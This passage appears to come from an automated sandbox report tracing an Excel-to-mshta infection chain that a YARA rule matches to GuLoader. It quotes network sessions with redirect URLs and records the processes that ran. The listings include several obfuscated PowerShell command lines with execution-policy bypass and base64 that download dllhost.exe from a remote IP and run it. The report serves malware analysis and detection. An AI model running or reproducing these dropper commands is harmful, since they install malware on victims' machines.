                                                                            Sep 30, 2024 09:57:00.946974993 CEST1236INData Raw: 5d 70 36 d5 02 48 4a ec de 18 69 70 bd 6a bd 53 90 56 8e 18 98 b5 f3 66 41 2b b9 90 63 a3 a9 d0 5e a2 06 e6 3d d8 ef ac c5 0c 1b 50 c5 bf fc 2e b9 fb f9 5c 78 e6 f8 0e 69 db f6 3f 87 26 6f b2 ce 95 ac ce 0a 32 d0 03 2b 54 ea ee e6 ae 14 97 43 02
                                                                            Data Ascii: ]p6HJipjSVfA+c^=P.\xi?&o2+TC2[da+9[N*Y0=`~:m"'n92\W{}&=5+^i[&d:Tm,aT<=mQ)#7Y.MdV_ gA(0
                                                                            Sep 30, 2024 09:57:00.951827049 CEST1236INData Raw: c1 db 83 9b 63 88 a7 e1 dc b2 22 e0 4b 0a 6d d1 44 b6 60 a6 86 d3 d4 f5 1b b8 49 08 cf b5 cf 6c 17 11 3f 5d 6f 4a 8c 43 5e 1c 22 a7 38 07 ac 9c d4 59 f3 d2 c6 c4 f1 ff 40 d3 54 6e be 73 e0 d2 ea e3 86 53 13 cc f0 ed 8f be cf 65 e7 3e bc d5 7d 29
                                                                            Data Ascii: c"KmD`Il?]oJC^"8Y@TnsSe>})CabNPK+T[M$n'b_a,/gqOv2b<?lTp}`/\8Mms/B0Imv<X9HQIBo>#7>[}}4-?-Xmj9(6


                                                                            HTTPS Proxied Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249163104.21.78.544433660C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-09-30 07:53:23 UTC319OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:24 UTC817INHTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:24 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6%2BoHQvAoZbbkkJipemOjVPMXlmXysmMLllMS2eLe%2BltoT57gFcyZ45rRulfKY3e%2FmHl%2BHsxw7XaxM6KcBVCRbOYngeuWS%2Fhkllftebjn6VgI6LyJiHqzGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a39539850f63-EWR
                                                                            2024-09-30 07:53:24 UTC77INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249165172.67.216.2444433924C:\Windows\System32\mshta.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-09-30 07:53:26 UTC343OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:27 UTC813INHTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:27 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hNfd60wY6QbA3Izt9Eyusb3c7lipeavc%2B7Et92kKgmq2NrUVuyg4TFCAnkIeHsFOxZQCd5E2EVcLbnLjGNAkLGHtHleiMaug56S0HjzA%2BgLohoOfNjt%2BS2g%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a3a4b960196c-EWR
                                                                            2024-09-30 07:53:27 UTC77INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.2249168104.21.78.544433660C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-09-30 07:53:44 UTC319OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:44 UTC817INHTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:44 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2FwWoyxk8gtGDVuXykl5nRNc%2BB2G8L08c0mHRjDrvjcSIG%2BHvJGHhmuqEOancALcdkhWN9VAQDCCuuMd%2Fd5%2BBd4eFPcEPFnmzJreeRIgOERpr89VKC3Ouzg%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a412ba2243d3-EWR
                                                                            2024-09-30 07:53:44 UTC77INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.2249169104.21.78.544431852C:\Windows\System32\mshta.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-09-30 07:53:48 UTC343OUTGET /2Rxzb3 HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Language: en-US
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: og1.in
                                                                            Connection: Keep-Alive
                                                                            2024-09-30 07:53:49 UTC841INHTTP/1.1 302 Found
                                                                            Date: Mon, 30 Sep 2024 07:53:49 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Content-Length: 77
                                                                            Connection: close
                                                                            location: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
                                                                            strict-transport-security: max-age=15552000; includeSubDomains
                                                                            vary: Accept
                                                                            x-content-type-options: nosniff
                                                                            x-dns-prefetch-control: off
                                                                            x-download-options: noopen
                                                                            x-frame-options: SAMEORIGIN
                                                                            x-xss-protection: 0
                                                                            CF-Cache-Status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19Gcaf8YbUtGer5FFDiACGrgnFQ0i6L2BLfCsomPk3pMLImy%2Fuz8zYd6fTVDrGG7pSovfh166ig4Llhn9WSw9HsgYQuNXjKXLDglLwTmgXcgGc3%2FzNqFMBs%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8cb2a42d4f6a8c75-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-09-30 07:53:49 UTC77INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 32 2e 33 2e 32 32 30 2e 32 32 2f 78 61 6d 70 70 2f 65 6e 2f 63 6f 6f 6b 69 65 6e 65 74 62 6f 6f 6b 69 6e 65 74 63 61 68 63 65 2e 68 74 61
                                                                            Data Ascii: Found. Redirecting to http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:03:53:01
                                                                            Start date:30/09/2024
                                                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                            Imagebase:0x13fb60000
                                                                            File size:28'253'536 bytes
                                                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:4
                                                                            Start time:03:53:24
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\mshta.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                            Imagebase:0x13f4b0000
                                                                            File size:13'824 bytes
                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:03:53:28
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x4aba0000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:03:53:28
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x13fbf0000
                                                                            File size:443'392 bytes
                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:03:53:31
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
                                                                            Imagebase:0x13f7e0000
                                                                            File size:2'758'280 bytes
                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:03:53:31
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA499.tmp" "c:\Users\user\AppData\Local\Temp\sm41lsyu\CSCE0CED41DA99B458392766F6BC82F0D5.TMP"
                                                                            Imagebase:0x13fee0000
                                                                            File size:52'744 bytes
                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:03:53:38
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                            Imagebase:0x400000
                                                                            File size:990'768 bytes
                                                                            MD5 hash:450228D72F9F726B645C55BBBC6DB905
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:12
                                                                            Start time:03:53:38
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
                                                                            Imagebase:0xfe0000
                                                                            File size:427'008 bytes
                                                                            MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.808389221.0000000009888000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:15
                                                                            Start time:03:53:44
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\mshta.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                            Imagebase:0x13f100000
                                                                            File size:13'824 bytes
                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:17
                                                                            Start time:03:53:49
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/C PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x4a110000
                                                                            File size:345'088 bytes
                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:19
                                                                            Start time:03:53:49
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:PoWeRSHElL -Ex BypaSs -nOp -W 1 -c DeVIcEcREdENTiaLdEplOYMENT.eXe ; iEx($(ieX('[SYsTeM.TExT.ENcODINg]'+[Char]0X3a+[Char]0X3A+'Utf8.getstRiNg([SYstEm.coNvErt]'+[chAR]58+[cHar]58+'FroMBAsE64sTrIng('+[chaR]34+'JEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJlUkRlZmluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZ3d0ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgREhBSGdCREYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkhzLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUVyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwdXphbUVkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic3MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElrc250TGdtU3F0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC4yMi80MzAvZGxsaG9zdC5leGUiLCIkZW52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c3RhclQtc2xFRXAoMyk7U1RhUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVuVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[cHAR]0x22+'))')))"
                                                                            Imagebase:0x13f530000
                                                                            File size:443'392 bytes
                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:20
                                                                            Start time:03:53:52
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
                                                                            Imagebase:0x13fa70000
                                                                            File size:2'758'280 bytes
                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:21
                                                                            Start time:03:53:53
                                                                            Start date:30/09/2024
                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF72C.tmp" "c:\Users\user\AppData\Local\Temp\r4gn3nq1\CSCA7279739985342FFA8B6946FD4222CB8.TMP"
                                                                            Imagebase:0x13f640000
                                                                            File size:52'744 bytes
                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:23
                                                                            Start time:03:53:57
                                                                            Start date:30/09/2024
                                                                            Path:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\dllhost.exe"
                                                                            Imagebase:0x400000
